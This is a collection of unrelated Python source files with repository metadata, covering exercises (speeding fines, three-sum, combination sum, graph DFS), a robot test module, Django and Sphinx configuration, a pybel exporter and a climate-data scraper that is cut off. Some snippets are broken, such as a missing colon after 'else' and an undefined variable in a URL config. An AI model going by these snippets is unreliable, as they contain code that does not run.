|
fb5b2473763dfa94d66d8421c73bf7091835c434
|
[] |
no_license
|
developyoun/AlgorithmSolve
|
8c7479082528f67be9de33f0a337ac6cc3bfc093
|
5926924c7c44ffab2eb8fd43290dc6aa029f818d
|
refs/heads/master
| 2023-03-28T12:02:37.260233
| 2021-03-24T05:05:48
| 2021-03-24T05:05:48
| 323,359,039
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 282
|
py
|
a = int(input())
b = int(input())
c = b - a
text = 'You are speeding and your fine is $'
if c <= 0:
print('Congratulations, you are within the speed limit!')
elif 1 <= c <= 20:
print(text + '100.')
elif 21 <= c <= 30:
print(text + '270.')
else:
print(text + '500.')
|
[
"pyoun820@naver.com"
] |
pyoun820@naver.com
|
e67247615c0c14d544e7c8db298cd60b3f91b096
|
0258d1982f3551ebebcd1e657d4ab1b487f61df9
|
/src/m0.py
|
6928a42a0981785bf342e398d16e9ae37b1abf5a
|
[] |
no_license
|
royjm21/rosebotics2
|
0f5ffe379a2122c880b1701d3a05e08a037ce8ae
|
382fedc8bc2475bc928e453483e322e101399122
|
refs/heads/master
| 2020-04-02T14:09:12.657825
| 2018-11-17T03:27:16
| 2018-11-17T03:27:16
| 154,512,503
| 0
| 0
| null | 2018-10-24T14:10:02
| 2018-10-24T14:10:02
| null |
UTF-8
|
Python
| false
| false
| 3,132
|
py
|
"""
Capstone Project. Code for testing basics.
Author: David Mutchler, based on work by Dave Fisher and others.
READ and RUN this module but ** DO NOT MODIFY IT. **
Fall term, 2018-2019.
"""
import rosebotics as rb
import time
def main():
""" Runs tests. """
run_tests()
def run_tests():
""" Runs various tests. """
run_test_drive_system()
# run_test_touch_sensor()
# run_test_color_sensor()
def run_test_drive_system():
""" Tests the drive_system of the Snatch3rRobot. """
robot = rb.Snatch3rRobot()
print()
print("Testing the drive_system of the robot.")
print("Move at (20, 50) - that is, veer left slowly")
robot.drive_system.start_moving(20, 50)
time.sleep(2)
robot.drive_system.stop_moving()
print("Left/right wheel positions:",
robot.drive_system.left_wheel.get_degrees_spun(),
robot.drive_system.right_wheel.get_degrees_spun())
time.sleep(1)
print()
print("Spin clockwise at half speed for 2.5 seconds")
robot.drive_system.move_for_seconds(2.5, 50, -50)
print("Left/right wheel positions:",
robot.drive_system.left_wheel.get_degrees_spun(),
robot.drive_system.right_wheel.get_degrees_spun())
robot.drive_system.left_wheel.reset_degrees_spun()
robot.drive_system.right_wheel.reset_degrees_spun(2000)
time.sleep(1)
print()
print("Move forward at full speed for 1.5 seconds, coast to stop")
robot.drive_system.start_moving()
time.sleep(1.5)
robot.drive_system.stop_moving(rb.StopAction.COAST)
print("Left/right wheel positions:",
robot.drive_system.left_wheel.get_degrees_spun(),
robot.drive_system.right_wheel.get_degrees_spun())
def run_test_touch_sensor():
""" Tests the touch_sensor of the Snatch3rRobot. """
robot = rb.Snatch3rRobot()
print()
print("Testing the touch_sensor of the robot.")
print("Repeatedly press and release the touch sensor.")
print("Press Control-C when you are ready to stop testing.")
time.sleep(1)
count = 1
while True:
print("{:4}.".format(count),
"Touch sensor value is: ", robot.touch_sensor.get_value())
time.sleep(0.5)
count = count + 1
def run_test_color_sensor():
""" Tests the color_sensor of the Snatch3rRobot. """
robot = rb.Snatch3rRobot()
print()
print("Testing the color_sensor of the robot.")
print("Repeatedly move the robot to different surfaces.")
print("Press Control-C when you are ready to stop testing.")
time.sleep(1)
count = 1
while True:
print("{:4}.".format(count),
"Color sensor value/color/intensity is: ",
"{:3} {:3} {:3}".format(robot.color_sensor.get_value()[0],
robot.color_sensor.get_value()[1],
robot.color_sensor.get_value()[2]),
"{:4}".format(robot.color_sensor.get_color()),
"{:4}".format(robot.color_sensor.get_reflected_intensity()))
time.sleep(0.5)
count = count + 1
main()
|
[
"mutchler@rose-hulman.edu"
] |
mutchler@rose-hulman.edu
|
f8cfe37328e46d44a30edc92197b0790ae37e435
|
760e84fc1ae36ccad2bf70bfac3d2ff18291b8ac
|
/gimbal/test/servo/sysfs_writer_dummy.py
|
6ead1a4b63e134d6e6b9c6063c322b70430f4416
|
[] |
no_license
|
dpm76/Gimbal
|
43b11497221657848f41a6440945d0601b379e23
|
6803867b359db76a420b2cc46192e0c475e35e6b
|
refs/heads/master
| 2022-09-27T23:33:58.402529
| 2022-08-27T10:06:09
| 2022-08-27T10:06:09
| 79,473,892
| 5
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,705
|
py
|
'''
Created on 19 ene. 2017
@author: david
'''
class SysfsWriterDummyFactory(object):
"""
Creates SysfsWriterDummy object
"""
def create(self):
"""
Creates writer
"""
return SysfsWriterDummy()
class SysfsWriterDummy(object):
"""
System filesystem's writer dummy
"""
def __init__(self):
self._dummyFiles = {}
self._workingFilePath = ""
def setPath(self, path):
"""
Set filepath. Any write opperation will be performed on this path
@param path: Filepath
"""
self._workingFilePath = path
return self
def write(self, text):
"""
Writes contents on the current path. It flushes immediately.
If no path was previously set, an exception will be raised.
@param text: Contents as string
"""
if self._workingFilePath:
self._dummyFiles[self._workingFilePath] = text
else:
raise Exception("No working path set or file was closed.")
return self
def close(self):
"""
Closes the current path
"""
self._workingFilePath = ""
return self
def read(self, path):
"""
Returns the contents of a path, or an exception raised if the path doesn't exist
@param path: Filepath
"""
if path in self._dummyFiles:
contents = self._dummyFiles[path]
else:
raise Exception("The path '{0}' doesn\'t exist.".format(path))
return contents
|
[
"davidpm.itengineer@gmail.com"
] |
davidpm.itengineer@gmail.com
|
ca7bed30ee38167e59191c271b76792174e59050
|
f780e660df46040ab05fd1bcb9657f7db7db65d4
|
/conf.py
|
a74a25f953271940de926868f4ea07741e3417b5
|
[
"BSD-2-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
systemonachip/systemonachip
|
35ffc00f4763333848cbca7e93a9e2cc1030b6de
|
6440b7ad7648a1affa1e6ddbdbf8d6fe76f57df7
|
refs/heads/main
| 2022-12-05T11:53:32.689536
| 2020-08-11T05:30:53
| 2020-08-11T05:30:53
| 283,394,238
| 4
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,926
|
py
|
# Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath('.'))
# -- Project information -----------------------------------------------------
project = 'System On a Chip'
copyright = '2020, Scott Shawcroft'
author = 'Scott Shawcroft'
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.napoleon',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store', '.env']
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
|
[
"scott@tannewt.org"
] |
scott@tannewt.org
|
10e9c876610b7fa2d64578976e7f2e46129f7bdb
|
21b5ad37b812ed78799d4efc1649579cc83d32fb
|
/job/migrations/0002_auto_20200212_1056.py
|
3c1cfe311d99524c0c1a26ac9408c01c9456878e
|
[] |
no_license
|
SaifulAbir/django-js-api
|
b6f18c319f8109884e71095ad49e08e50485bb25
|
fbf174b9cde2e7d25b4898f511df9c6f96d406cf
|
refs/heads/master
| 2023-02-12T16:09:21.508702
| 2021-01-14T09:05:15
| 2021-01-14T09:05:15
| 329,713,528
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 604
|
py
|
# Generated by Django 3.0.3 on 2020-02-12 10:56
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('job', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='job',
name='company_profile',
field=models.CharField(blank=True, max_length=255, null=True),
),
migrations.AlterField(
model_name='job',
name='created_date',
field=models.DateField(default=django.utils.timezone.now),
),
]
|
[
"rashed@ishraak.com"
] |
rashed@ishraak.com
|
6a67e5f262b74518db7e0ef4f6c9034700ff7848
|
238cff74530e5571648da88f127d086d2d9294b4
|
/0x0F-python-object_relational_mapping/0-select_states.py
|
76e5988a937a8573ef3ef92f91e4dd16f923e481
|
[] |
no_license
|
Achilik/holbertonschool-higher_level_programming-6
|
b92fcbd1bc6bbedcfef4b49bb3907d97b8be41ff
|
d0c46cc5ed2bfd1c8d75ce4a2a7604fc4f3f1c5c
|
refs/heads/master
| 2023-03-21T08:03:31.613145
| 2018-09-08T10:10:53
| 2018-09-08T10:10:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 391
|
py
|
#!/usr/bin/python3
"""List all states using mysqldb"""
if __name__ == "__main__":
import MySQLdb
from sys import argv
db = MySQLdb.connect(host="localhost", user=argv[1],
passwd=argv[2], db=argv[3])
cur = db.cursor()
cur.execute("SELECT id, name FROM states")
for row in cur.fetchall():
print("({}, '{}')".format(row[0], row[1]))
|
[
"sidneyriffic@gmail.com"
] |
sidneyriffic@gmail.com
|
0082a8cb5b9a83ed11b53f2a67daa38f739be429
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02382/s713591179.py
|
09cde9d080d0b47f07d303ae5fc2bac9e18b8f66
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 246
|
py
|
n = int(input())
X = list(map(int, input().split()))
Y = list(map(int, input().split()))
for i in range(1, 4):
D = 0
for j in range(n):
D += abs(X[j] - Y[j])**(i)
print(D**(1/i))
print(max(abs(X[i] - Y[i]) for i in range(n)))
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
071deea967dc8da3caebd1c55e369f2362413914
|
4c20c78cf383cd40db8e3d3eee88e5f96884a1af
|
/39.combination_sum/39.combination-sum.py
|
6b75d489a8226c53faff5049bcc53be904b43fec
|
[] |
no_license
|
HanchengZhao/Leetcode-exercise
|
de6c17a2c965fe0c3afc0a4c39fc0a5f8bbe8d47
|
6c780a97c956856ac94a5d0bb4c9b631e7a0677a
|
refs/heads/master
| 2021-05-04T10:09:29.308858
| 2019-10-17T05:31:20
| 2019-10-17T05:31:20
| 50,731,817
| 7
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 721
|
py
|
#
# @lc app=leetcode id=39 lang=python3
#
# [39] Combination Sum
#
class Solution:
def combinationSum(self, candidates: List[int], target: int) -> List[List[int]]:
def recursion(cur, cursum, candidates, target, res, index):
if cursum > target:
return
if cursum == target:
res.append(cur)
return
# we can only use the numbers at/after this index to avoid duplicates
for i in range(index, len(candidates)):
num = candidates[i]
recursion(cur + [num], cursum + num, candidates, target, res, i)
res = []
recursion([], 0, candidates, target, res, 0)
return res
|
[
"chancidy@gmail.com"
] |
chancidy@gmail.com
|
0a7ba83dd16fddc2a53c7fbc33ae451f3e7d5ab5
|
b627f23744e305c0d90044669a6ec68cf59bc146
|
/src/ls_sms_api/ls_sms_api/wsgi.py
|
d309f6fbb20ae8fa35be63890cccb03c64dfd2ae
|
[] |
no_license
|
wisnercelucus/ls-sms-api
|
751689d0c11974547d9adcabcea91f06f404656d
|
9ff8bce77561641b6f7ba9b4e99378efbb8c0ef5
|
refs/heads/master
| 2022-04-12T21:52:37.619685
| 2020-03-26T20:04:46
| 2020-03-26T20:04:46
| 250,121,282
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 397
|
py
|
"""
WSGI config for ls_sms_api project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "ls_sms_api.settings")
application = get_wsgi_application()
|
[
"wisnercelicus@gmail.com"
] |
wisnercelicus@gmail.com
|
4a437d4905608bd5f842a14f4a686edb4aa40ee5
|
19bc8a9343aa4120453abeff3deddda7d900f774
|
/ProgrammingInterviewQuestions/43_Anagrams.py
|
744e4ded887e1af67a814418dd617356895feac5
|
[] |
no_license
|
ArunkumarRamanan/CLRS-1
|
98643cde2f561d9960c26378ae29dd92b4c3fc89
|
f085db885bcee8d09c1e4f036517acdbd3a0918e
|
refs/heads/master
| 2020-06-28T08:30:44.029970
| 2016-11-19T15:27:55
| 2016-11-19T15:27:55
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 457
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Sun Oct 30 19:21:36 2016
@author: Rahul Patni
"""
def number_needed(a, b):
array1 = [0] * 26
array2 = [0] * 26
for i in a:
array1[ord(i) - ord('a')] += 1
for i in b:
array2[ord(i) - ord('a')] += 1
total = 0
for i in range(0, 26):
total += abs(array1[i] - array2[i])
return total
a = raw_input().strip()
b = raw_input().strip()
print number_needed(a, b)
|
[
"rahul20patni@gmail.com"
] |
rahul20patni@gmail.com
|
3549f6ce778e95719ac1407a7e5ac63203c9c77f
|
7621cc5db1f87bc4c95ec1d0b80860c74787a0d1
|
/loco/urls.py
|
eab5993189bc2a7a303e55e7d953a6966601dd4b
|
[] |
no_license
|
ingenieroariel/loco
|
0b53f3c2e871db7d04a82b898c61ee63173e0f47
|
79245b63f082e5b393bacae87d44cea6df66dcff
|
refs/heads/master
| 2021-01-10T09:47:55.575723
| 2015-10-06T19:34:32
| 2015-10-06T19:34:32
| 43,713,454
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,177
|
py
|
"""loco URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.8/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Add an import: from blog import urls as blog_urls
2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))
"""
from django.conf.urls import include, url
from django.contrib import admin
from django.views.generic import ListView
from osm.models import Banks
from djgeojson.views import GeoJSONLayerView
from django.contrib.gis.measure import D
bancos_barranquilla = Banks.objects.filter(wkb_geometry__distance_lte=(barranquilla, D(km=20)))
urlpatterns = [
url(r'^$', ListView.as_view(queryset=bancos_barranquilla, template_name='osm/banks.html')),
url(r'^banks$', GeoJSONLayerView.as_view(model=Banks), name='data'),
url(r'^admin/', include(admin.site.urls)),
]
|
[
"ingenieroariel@gmail.com"
] |
ingenieroariel@gmail.com
|
f187e58d408ba609b2fb5abbcc73fb9cbd3f2144
|
3cf0d750948a758d5771dd778fbb783d64a044ae
|
/src/algo_cases/第4章/4_2.py
|
01cd88698a2920f4ad2133718f14a27994e6cd3d
|
[
"CC-BY-NC-SA-4.0",
"Apache-2.0"
] |
permissive
|
hbulpf/pydemo
|
6552a08b3c85721ac1b2ba335b030e234ad03b6c
|
ea3e9f9086116a86ecef803e9e3179a34c94c20f
|
refs/heads/master
| 2022-11-30T21:06:29.933820
| 2022-01-15T17:05:16
| 2022-01-15T17:05:16
| 237,584,300
| 6
| 1
|
Apache-2.0
| 2022-11-22T09:49:38
| 2020-02-01T08:20:43
|
Python
|
UTF-8
|
Python
| false
| false
| 1,160
|
py
|
def threeSum(self, array):
array.sort()
length=len(array)
res=[]
for i in range(length):#三层循环
for j in range (i+1,length):
for k in range(j+1,length):
if array[i]+array[k]+array[j]==0 and not [array[i],array[j],array[k]] in res:
res.append([array[i],array[j],array[k]])
return res
def threeSum(self, array):
array.sort()
res= []
for k in range(len(array) - 2):
if array[k] > 0: break
if k > 0 and array[k] == array[k - 1]: continue
l, r= k + 1, len(array) - 1
while l < r:
s = array[k] + array[l] + array[r]
if s < 0:
l += 1
while l < r and array[l] == array[l - 1]: l += 1#进行元素去重
elif s > 0:
r -= 1
while l < r and array[r] == array[r + 1]: r -= 1
else:
res.append([array[k], array[l], array[r]])
l += 1
r -= 1
while l < r and array[l] == array[l - 1]: l += 1
while l < r and array[r] == array[r + 1]: r -= 1
return res
|
[
"hudalpf@163.com"
] |
hudalpf@163.com
|
409252b48117af3db718766805d451249d2060cc
|
0725ed7ab6be91dfc0b16fef12a8871c08917465
|
/graphs/key_and_rooms.py
|
715456607ef58e9519dae068c8bde6f79cd99bf7
|
[] |
no_license
|
siddhism/leetcode
|
8cb194156893fd6e9681ef50c84f0355d09e9026
|
877933424e6d2c590d6ac53db18bee951a3d9de4
|
refs/heads/master
| 2023-03-28T08:14:12.927995
| 2021-03-24T10:46:20
| 2021-03-24T10:46:20
| 212,151,205
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,172
|
py
|
from collections import defaultdict
class Graph:
def __init__(self, V):
self.graph = defaultdict(list)
self.V = V
self.visited = [False for _ in range(self.V + 1)]
def add_edge(self, u, v):
self.graph[u].append(v)
def DFSUtil(self, u):
self.visited[u] = True
# print u,
for neighbour in self.graph[u]:
if not self.visited[neighbour]:
self.DFSUtil(neighbour)
def DFS(self, u):
self.DFSUtil(u)
def print_graph(self):
for k, v in self.graph.items():
print k, ' -> ', v
class Solution(object):
def canVisitAllRooms(self, rooms):
"""
:type rooms: List[List[int]]
:rtype: bool
"""
# build graph
graph = Graph(len(rooms))
for room_index, keys in enumerate(rooms):
for key in keys:
graph.add_edge(room_index, key)
# graph.print_graph()
graph.DFS(0)
all_visited = True
for i in range(len(rooms)):
if not graph.visited[i]:
all_visited = False
break
return all_visited
|
[
"siddhesh@hackerearth.com"
] |
siddhesh@hackerearth.com
|
2345216ef12a7ccfdb9d835b9d96af3569cd556a
|
c5d131cf7a5e5667b5f6983512d132f9817c7310
|
/geosite/views.py
|
d7bdc0815adbffb6a4a95113c6636eef66b60b3b
|
[] |
no_license
|
wfp-ose/geosite-framework-django
|
0e6596d241498cfe3b5bb696abee27da511a8b1d
|
ffb3f805cca708e7b95abe59a1b1b8e3916783a3
|
refs/heads/master
| 2021-01-21T04:55:47.253100
| 2016-06-03T15:37:21
| 2016-06-03T15:37:21
| 51,529,078
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,424
|
py
|
import errno
from socket import error as socket_error
from django.conf import settings
from django.views.generic import View
from django.shortcuts import HttpResponse, render_to_response
try:
import simplejson as json
except ImportError:
import json
from geosite.cache import provision_memcached_client
class geosite_data_view(View):
key = None
content_type = "application/json"
def _build_key(self, request, *args, **kwargs):
return self.key
def _build_data(self):
raise Exception('geosite_data_view._build_data should be overwritten')
def get(self, request, *args, **kwargs):
data = None
if settings.GEOSITE_CACHE_DATA:
client = provision_memcached_client()
if client:
key = self._build_key(request, *args, **kwargs)
print "Checking cache with key ", key
data = None
try:
data = client.get(key)
except socket_error as serr:
data = None
print "Error getting data from in-memory cache."
if serr.errno == errno.ECONNREFUSED:
print "Memcached is likely not running. Start memcached with supervisord."
raise serr
if not data:
print "Data not found in cache."
data = self._build_data(request, *args, **kwargs)
try:
client.set(key, data)
except socket_error as serr:
print "Error saving data to in-memory cache."
if serr.errno == errno.ECONNREFUSED:
print "Memcached is likely not running or the data exceeds memcached item size limit. Start memcached with supervisord."
raise serr
else:
print "Data found in cache."
else:
print "Could not connect to memcached client. Bypassing..."
data = self._build_data(request, *args, **kwargs)
else:
print "Not caching data (settings.GEOSITE_CACHE_DATA set to False)."
data = self._build_data(request, *args, **kwargs)
return HttpResponse(json.dumps(data, default=jdefault), content_type=self.content_type)
def jdefault(o):
return o.__dict__
|
[
"pjdufour.dev@gmail.com"
] |
pjdufour.dev@gmail.com
|
b4ecd05bf9fcf51d6c49b525e8a5af982ae4959d
|
c1a04c3dd2956ffd055020d5a73ceeb18b0367fe
|
/tests/builtins/test_bool.py
|
8a7cb0994edcab1e7d566c000ded0430d8afbc03
|
[
"BSD-3-Clause",
"MIT"
] |
permissive
|
matthewphillips/batavia
|
1f145d0ac2182875c6d1734fbc8510a654ee932e
|
b69c1f419674ecf214c474c754912f2e0cf5c65d
|
refs/heads/master
| 2021-01-21T06:33:04.213885
| 2017-02-26T22:10:50
| 2017-02-26T22:10:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,383
|
py
|
from .. utils import TranspileTestCase, BuiltinFunctionTestCase
import unittest
class BoolTests(TranspileTestCase):
def test_bool_omitted(self):
self.assertCodeExecution("""
print(bool())
""")
def test_bool_like(self):
self.assertCodeExecution("""
class BoolLike:
def __init__(self, val):
self.val = val
def __bool__(self):
return self.val == 1
print(bool(BoolLike(0)))
print(bool(BoolLike(1)))
""")
def test_len_only(self):
self.assertCodeExecution("""
class LenButNoBool:
def __init__(self, val):
self.val = val
def __len__(self):
return self.val
print(bool(LenButNoBool(0)))
print(bool(LenButNoBool(1)))
""")
def test_no_bool_no_len(self):
self.assertCodeExecution("""
class NoLenNoBool:
def __init__(self, val):
self.val = val
print(bool(NoLenNoBool(0)))
print(bool(NoLenNoBool(1)))
print(bool(NoLenNoBool(42)))
print(bool(NoLenNoBool(-2)))
""")
class BuiltinBoolFunctionTests(BuiltinFunctionTestCase, TranspileTestCase):
functions = ["bool"]
|
[
"russell@keith-magee.com"
] |
russell@keith-magee.com
|
d5997425aae6fc467a61b580ad532ab834fe952f
|
f40cc44ebfc337326577c91cd88d0c1dd845b098
|
/LuminarPythonPrograms/Collection/ListDemo/Listprogram3.py
|
1150ec798fe3462679fb73faf13793e2b97562f8
|
[] |
no_license
|
Aswin2289/LuminarPython
|
6e07d6f9bf6c8727b59f38f97f5779a33b2fab0d
|
ba633a276dd79bbf214cfceac2413c894eaa1875
|
refs/heads/master
| 2023-01-01T07:52:41.598110
| 2020-10-13T04:34:49
| 2020-10-13T04:34:49
| 290,109,547
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 158
|
py
|
#print power
lst=[2,4,6]
# le=len(lst)
# res=0
# for i in range(0,le):
# res=lst[i]**i
# print(res)
cnt=1
for i in lst:
print(i**cnt)
cnt+=1
|
[
"aswinabraham4@gmail.com"
] |
aswinabraham4@gmail.com
|
916b8f251e993a18dbf69cffb2c0341c30bcdbc2
|
3e600966adc8f0fe7114d5d988b32ead395edff2
|
/src/pybel_tools/definition_utils/summary_dependent.py
|
58d64d00c93a2c7a81b2bf6591dcd2dc565b6dae
|
[
"Apache-2.0"
] |
permissive
|
johnbachman/pybel-tools
|
cadf407609462b9c2faaa62e5d35464fa27c1b7f
|
c691d7b33d449501142eb011bc2b8f63830645cf
|
refs/heads/develop
| 2021-09-14T20:30:07.873760
| 2018-05-10T14:07:08
| 2018-05-10T14:07:08
| 105,606,597
| 0
| 0
| null | 2017-10-03T02:23:24
| 2017-10-03T02:23:23
| null |
UTF-8
|
Python
| false
| false
| 3,443
|
py
|
# -*- coding: utf-8 -*-
import logging
import os
from pybel.constants import *
from pybel.resources.definitions import write_namespace
from pybel.struct.summary.node_summary import get_names_by_namespace
from ..summary.error_summary import get_incorrect_names_by_namespace, get_undefined_namespace_names
log = logging.getLogger(__name__)
__all__ = [
'export_namespace',
'export_namespaces',
]
def export_namespace(graph, namespace, directory=None, cacheable=False):
"""Exports all names and missing names from the given namespace to its own BEL Namespace files in the given
directory.
Could be useful during quick and dirty curation, where planned namespace building is not a priority.
:param pybel.BELGraph graph: A BEL graph
:param str namespace: The namespace to process
:param str directory: The path to the directory where to output the namespace. Defaults to the current working
directory returned by :func:`os.getcwd`
:param bool cacheable: Should the namespace be cacheable? Defaults to ``False`` because, in general, this operation
will probably be used for evil, and users won't want to reload their entire cache after each
iteration of curation.
"""
directory = os.getcwd() if directory is None else directory
path = os.path.join(directory, '{}.belns'.format(namespace))
with open(path, 'w') as file:
log.info('Outputting to %s', path)
right_names = get_names_by_namespace(graph, namespace)
log.info('Graph has %d correct names in %s', len(right_names), namespace)
wrong_names = get_incorrect_names_by_namespace(graph, namespace)
log.info('Graph has %d incorrect names in %s', len(right_names), namespace)
undefined_ns_names = get_undefined_namespace_names(graph, namespace)
log.info('Graph has %d names in missing namespace %s', len(right_names), namespace)
names = (right_names | wrong_names | undefined_ns_names)
if 0 == len(names):
log.warning('%s is empty', namespace)
write_namespace(
namespace_name=namespace,
namespace_keyword=namespace,
namespace_domain='Other',
author_name=graph.authors,
author_contact=graph.contact,
citation_name=graph.name,
values=names,
cacheable=cacheable,
file=file
)
def export_namespaces(graph, namespaces, directory=None, cacheable=False):
"""Thinly wraps :func:`export_namespace` for an iterable of namespaces.
:param pybel.BELGraph graph: A BEL graph
:param iter[str] namespaces: An iterable of strings for the namespaces to process
:param str directory: The path to the directory where to output the namespaces. Defaults to the current working
directory returned by :func:`os.getcwd`
:param bool cacheable: Should the namespaces be cacheable? Defaults to ``False`` because, in general, this operation
will probably be used for evil, and users won't want to reload their entire cache after each
iteration of curation.
"""
directory = os.getcwd() if directory is None else directory # avoid making multiple calls to os.getcwd later
for namespace in namespaces:
export_namespace(graph, namespace, directory=directory, cacheable=cacheable)
|
[
"cthoyt@gmail.com"
] |
cthoyt@gmail.com
|
5f537997bcb48f2972f8668304590a3e7b11e283
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_034/ch129_2020_04_01_17_00_30_862850.py
|
b356e9c2aff07bffe76f355aa509f1e0320549e5
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628
| 2020-12-16T05:21:31
| 2020-12-16T05:21:31
| 306,735,108
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 172
|
py
|
def verifica_quadrado_perfeito(n):
impar = 1
while n != 0:
n = n - impar
impar += 2
if n == 0:
return True
else
return False
|
[
"you@example.com"
] |
you@example.com
|
d43ed31749be13b25dc97002e6e7499aad5038d9
|
8ea2d923fcb193846ff925abcbef8f97c394936e
|
/climate_app/views.py
|
2fc27ba7af83708082858e0ac79e0b6629ad1e72
|
[] |
no_license
|
amrit-kumar/climate_data_and_graph
|
6a32b969e3d13953f1e74baed720e824d7dd61b0
|
c793bd38474ba11ef50b76739d979f3f8c910dbf
|
refs/heads/master
| 2021-01-16T18:55:32.359620
| 2017-08-12T18:28:52
| 2017-08-12T18:28:52
| 100,129,094
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,211
|
py
|
import requests
from django.http.response import HttpResponse
from .models import ClimateData,ClimateStatistics
from urllib.request import Request,urlopen
from django.core.files import File
from django.core.files.temp import NamedTemporaryFile
import re
from django.shortcuts import render
from django.core.files.storage import FileSystemStorage
import os
import csv
import uuid
def get_file_climate_condition(urls,region):
for url in urls:
res = requests.get(url)
file_temp = NamedTemporaryFile()
file_temp.write(res.content)
file_temp.flush()
climate_obj = ClimateData()
climate_obj.region = region
climate_obj.save()
if "Tmax" in url:
climate_obj.max_temp.save("Maxtemp", File(file_temp))
if "Tmin" in url:
climate_obj.min_temp.save("Min_temp", File(file_temp))
if "Tmean" in url:
climate_obj.mean_temp.save("Mean_temp", File(file_temp))
if "Sunshine" in url:
climate_obj.sunshine.save("Sunshine_temp", File(file_temp))
if "Rainfall" in url:
climate_obj.rainfall.save("Rainfall_temp", File(file_temp))
return HttpResponse()
def uk_climate(regin_uk,region):
max_temp_url = [climate_cond for climate_cond in regin_uk if "Tmax" in climate_cond ]
min_temp_url = [climate_cond for climate_cond in regin_uk if "Tmin" in climate_cond]
mean_temp_url = [climate_cond for climate_cond in regin_uk if "Tmean" in climate_cond]
sunshine_url = [climate_cond for climate_cond in regin_uk if "Sunshine" in climate_cond]
rainfall_url = [climate_cond for climate_cond in regin_uk if "Rainfall" in climate_cond]
urls=max_temp_url+min_temp_url+mean_temp_url+sunshine_url+rainfall_url
get_file_climate_condition(urls,region)
return HttpResponse()
def download_climate_files(request):
ClimateStatistics.objects.all().delete()
url = Request("http://www.metoffice.gov.uk/climate/uk/summaries/datasets#Yearorder", headers={'User-Agent': 'Mozilla/5.0'})
site = urlopen(url)
html = site.read().decode('utf-8')
links = re.findall('"((http|ftp)s?://.*?)"', html)
OutputTuple = [(a) for a ,b in links]
year_ordered=[url for url in OutputTuple if "date" in url]
regin_uk=[regin_uk for regin_uk in year_ordered if "/UK.txt" in regin_uk]
regin_england=[regin_england for regin_england in year_ordered if "/England.txt" in regin_england]
regin_wales=[regin_wales for regin_wales in year_ordered if "/Wales.txt" in regin_wales]
regin_scotland=[regin_scotland for regin_scotland in year_ordered if "/Scotland.txt" in regin_scotland]
uk_climate(regin_uk,region="UK")
uk_climate(regin_england,region="England")
uk_climate(regin_wales,region="Wales")
uk_climate(regin_scotland,region="Scotland")
return HttpResponse("Ok")
def text_yearwise_data(request):
ClimateStatistics.objects.all().delete()
path ='C:\\Users\\AMRIT\\Desktop\\project\\climate\\media\\downloads'
files = os.listdir(path)
for file in files:
pathIn = path + "/" + file
id = uuid.uuid1()
